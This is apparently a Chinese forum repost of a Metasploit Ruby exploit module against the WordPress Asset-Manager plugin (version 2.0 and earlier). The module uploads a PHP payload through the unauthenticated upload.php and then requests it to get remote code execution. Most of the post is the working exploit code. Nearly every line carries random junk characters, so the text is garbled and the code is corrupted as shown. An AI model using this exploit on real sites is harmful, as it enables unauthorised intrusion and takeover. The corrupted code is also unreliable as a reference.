这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
' ]5 S" w1 v+ @8 c/ ` e7 C9 y7 s7 d& }3 B+ A9 \
##: z, i- r$ ]$ i p$ Q8 I: k
# This file is part of the Metasploit Framework and may be subject to8 w( E, E5 t$ L6 S
# redistribution and commercial restrictions. Please see the Metasploit
- j3 Z/ V. O8 V- b& X# Framework web site for more information on licensing and terms of use.* i; @# W- J- b( ^8 C0 O! U! z' ?
# http://metasploit.com/framework/! p; W; X0 T3 r5 e( m5 }
##
8 a, [' r6 @2 r$ P$ ], m 8 H" A, p: K6 X/ J: [. g5 A' D
require 'msf/core'1 B' o `# L- {/ c
require 'msf/core/exploit/php_exe'
0 L7 W/ r$ V# V2 c 7 F6 U# Q, ^+ W. t# Y2 \
class Metasploit3 < Msf::Exploit::Remote
1 ?' N/ N) a) R; l Rank = ExcellentRanking) P" A, s, X5 s( i" Q: R
/ i7 d4 o& x4 ~! ^4 M include Msf::Exploit::Remote::HttpClient" z. R$ t! ~8 Y# f# ?. {$ Q' H
include Msf::Exploit: hpEXE5 {" T8 G9 @4 ?$ N
w- F7 w3 y% }8 V3 K2 X% J
def initialize(info = {})
" N; W5 u/ a7 ]% |, Q super(update_info(info,; }6 D) x6 _2 V) b+ Y
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
' J" }/ R0 ^4 N8 D: q3 b; u 'Description' => %q{
# j7 [4 ?: {' @4 E" v: E This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
; `0 @/ r' h- z plugin. By abusing the upload.php file, a malicious user can upload a file to a4 \; u2 r& \" X0 o2 W4 V2 y3 @# L% n
temp directory without authentication, which results in arbitrary code execution.
! Z' J1 c( f3 I& ]% v) F7 A3 J8 O },7 z* ^' M6 A: C/ u, [
'Author' =>
+ a4 G) I# I$ J/ G [
* j1 S% X+ g; Z9 }1 j 'Sammy FORGIT', # initial discovery" [' U1 }: y+ I; }$ m
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
- f+ h1 Q3 M, V( H2 f4 r+ v0 i ],0 O' s2 {5 E2 |: ?3 Y1 d
'License' => MSF_LICENSE,# [) j% V: c r& w8 O/ p
'References' =>
, v _; q" m. O' p [/ k6 _; t& ^+ P; p. }
[ 'OSVDB', '82653' ],
2 U, o5 P: x& }6 i+ m8 U [ 'BID', '53809' ]," d# w# V0 U2 X# N0 m
[ 'EDB', '18993' ],: y( h/ l8 U: V
[ 'URL', 'http:// www.myhack58.com /' ]
, k& C! ?: ~+ R3 r( f: j+ d3 h/ R, f ],
8 M- _- ~2 U- @. A! v5 o) E& M 'Payload' =>
: V r) ~$ C S: L. ` {8 F' b% B4 Q/ W' ] J4 ^) I* G8 X( h5 a q. r
'BadChars' => "\x00",
; D$ i" f( _9 }! S0 ^8 P+ g },% b) U' C. N0 {- z# W0 E
'Platform' => 'php',' H9 w4 {9 d; E" s! Q
'Arch' => ARCH_PHP,: D( j1 y: J' G5 m1 w
'Targets' =>
]6 t8 ]; H b: ^+ o* y" ` [6 Z3 J& n/ k1 r1 C
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
: o0 p" u3 M y7 s [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]- h* `9 w ]0 A" R5 m: U; h/ _& f
],
: E) e d& L* ] 'DefaultTarget' => 0,5 y: V7 W, o7 `
'DisclosureDate' => 'May 26 2012'))
+ j7 M# G ~' p. `: A 3 h: N) M$ `2 N: d$ p" n+ a% Q* T
register_options(+ U1 ^! g) }# k
[
! ]2 |( B: c( t. O6 t8 K OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
8 k! P i9 c! D$ s ], self.class); S; N% B" e" j% O. A2 S {/ l
end# F) W/ o2 u- s/ E
- W) Q. ~& o. }7 M5 W+ G; a& m def exploit
; W2 P3 m; y- }2 a7 O$ Y0 Y uri = target_uri.path
/ K+ R, p3 G- J" f$ m uri << '/' if uri[-1,1] != '/'
# {: F3 u2 k& ~ o7 \& ?: ? peer = "#{rhost}:#{rport}"0 N" c; z( I; v+ ?
payload_name = "#{rand_text_alpha(5)}.php"
: T% d+ @. G2 K) ? O php_payload = get_write_exec_payload(:unlink_self=>true)5 @5 L a* K. ^
* k: D; W7 \ L9 k
data = Rex::MIME::Message.new
7 v1 H+ o4 l2 N/ K' @" J data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")) ^$ P' t% G1 D, F/ F5 c
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'), U3 ^; g/ z$ E* C% A- R5 @5 F8 Q' N
- n4 D3 b% [1 m; G
print_status("#{peer} - Uploading payload #{payload_name}")
1 ~- T6 i7 C/ L: R. M res = send_request_cgi({9 ~% X* ^/ V/ h
'method' => 'POST',
3 z4 c8 ^3 [: O9 J 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
9 O4 x" m. @% n' U 'ctype' => "multipart/form-data; boundary=#{data.bound}",
( u- c: Y0 I* G2 h9 l% o 'data' => post_data9 n# C! ~) c% C, y
})
6 I* ~6 b) c- Z+ `% J1 B! o 8 H8 z8 l$ B; R8 w# D
if not res or res.code != 200 or res.body !~ /#{payload_name}/
) v1 o9 c" W. \' m8 o8 V fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")- V0 U/ U( O. p* U' d) Z2 V
end }1 B! v+ F1 [- |% N5 F* Z+ q) g
: O8 C/ M5 B% y j# G* m print_status("#{peer} - Executing payload #{payload_name}")
/ \& T G* ^6 Q& e! X2 X% B* F res = send_request_raw({3 {9 j7 f0 W; a8 I3 I7 C- h
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
* X$ ^2 y: ]6 d* M; I. _ 'method' => 'GET'
o$ G: ~3 K4 a) s6 B! n4 n })
6 h6 }: Y- s% Q& ~; w4 Q8 b
1 N1 p, ]) X6 n0 ` if res and res.code != 200
/ i8 Q' a# x. F" a% P9 \8 B fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
3 D+ \% i! \+ G6 K# }; G& m' y9 _& _: ~ end$ r" |$ `, c% T5 _) w
end
) Z) |0 F: H3 uend
$ E* s8 }8 K3 k7 y0 j |
发表于 2012-12-31 09:22:33
收藏
支持
反对